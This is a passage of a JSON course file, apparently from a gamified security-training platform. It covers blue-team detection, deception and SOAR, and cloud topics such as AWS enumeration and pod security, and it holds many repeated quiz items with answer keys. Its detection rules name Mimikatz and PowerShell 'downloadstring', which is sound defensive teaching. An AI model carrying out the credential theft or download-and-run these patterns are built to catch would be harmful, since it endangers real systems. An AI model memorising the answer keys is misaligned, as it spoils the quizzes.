because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-sigma","cat":"Defense & Blue Team","title":"Sigma Detection Rules","diff":3,"xp":200,"intro":"Vendor-neutral detection rules.","sections":[{"type":"text","content":"Write once, convert to Splunk/Elastic/KQL."},{"type":"code","lang":"yaml","content":"title: Mimikatz\nlogsource:\n  category: process_creation\ndetection:\n  selection:\n    Image|endswith: 'mimikatz.exe'\n  condition: selection"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Sigma rules are valuable because...","opts":["Splunk only","They convert to any SIEM's query language","Replace YARA","Simpler than regex"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-deception-adv","cat":"Defense & Blue Team","title":"Advanced Deception","diff":4,"xp":250,"intro":"Deception across the kill chain.","sections":[{"type":"text","content":"Honey creds, shares, DNS entries, tokens, documents."},{"type":"code","lang":"bash","content":"# Recon: honey DNS entries\n# Cred access: honey creds in LSASS\n# Lateral: honey shares\n# Exfil: honey AWS keys"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Advanced deception covers...","opts":["Only honeypots","Every kill chain stage with different traps","Only files","Only creds"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-soar","cat":"Defense & Blue Team","title":"SOC Automation (SOAR)","diff":4,"xp":250,"intro":"Automate repetitive SOC tasks.","sections":[{"type":"text","content":"IP lookups, hash checks, account disable, host isolation \u2014 automated."},{"type":"code","lang":"bash","content":"# SOAR playbook: phishing\n# Auto: extract URLs, check VT, sandbox attachment\n# Auto: quarantine, block sender\n# Auto: isolate endpoint if clicked"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"SOAR automates to...","opts":["Replace analysts","Reduce response time for repetitive tasks","Eliminate threats","Remove SIEM"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-detection-eng","cat":"Defense & Blue Team","title":"Detection Engineering","diff":4,"xp":300,"intro":"Build rules that catch attackers, not noise.","sections":[{"type":"text","content":"Technique -> data source -> normal vs malicious -> rule -> test -> deploy."},{"type":"code","lang":"bash","content":"# T1059.001: PowerShell\nindex=windows EventCode=4104 ScriptBlockText IN ('*Invoke-Mimikatz*','*downloadstring*')"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Detection engineering starts with...","opts":["Buying SIEM","Understanding the technique and data source","Installing AV","Hiring analysts"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-threat-ops","cat":"Defense & Blue Team","title":"Operationalizing Threat Intel","diff":4,"xp":250,"intro":"Turn reports into blocks, detections, and hunts.","sections":[{"type":"text","content":"Block IOCs immediately, write rules, hunt historically."},{"type":"code","lang":"bash","content":"# 1. BLOCK: add IOCs to blocklists\n# 2. DETECT: write SIEM rules\n# 3. HUNT: search historical logs"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Which action is immediate?","opts":["Writing rules","Blocking known IOCs","Hunting","Updating report"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"cl-aws-enum","cat":"Cloud & Container","title":"AWS Account Enumeration","diff":1,"xp":100,"intro":"Discover what's in an AWS account.","sections":[{"type":"text","content":"sts get-caller-identity, then enumerate services."},{"type":"code","lang":"bash","content":"aws sts get-caller-identity\naws s3 ls\naws ec2 describe-instances\naws lambda list-functions"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"First AWS command should be...","opts":["aws s3 ls","aws sts get-caller-identity","aws ec2 terminate-instances","aws iam create-user"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-pod-sec","cat":"Cloud & Container","title":"Pod Security Standards","diff":2,"xp":150,"intro":"Restrict what pods can do.","sections":[{"type":"text","content":"Privileged/Baseline/Restricted security contexts."},{"type":"code","lang":"yaml","content":"securityContext:\n  runAsNonRoot: true\n  allowPrivilegeEscalation: false\n  capabilities:\n    drop: ['ALL']"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"allowPrivilegeEscalation:false prevents...","opts":["Network","Gaining more privileges than parent process","File access","DNS"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-secrets","cat":"Cloud & Container","title":"Cloud Secrets Management","diff":2,"xp":150,"intro":"Stop hardcoding secrets.","sections":[{"type":"text","content":"AWS Secrets Manager, Vault, Azure Key Vault."},{"type":"code","lang":"bash","content":"aws secretsmanager create-secret --name prod/db --secret-string 'pass'\nvault kv put secret/db password=pass"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Secrets should be in...","opts":["Env vars","A dedicated secrets manager","Source code","Text files"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit 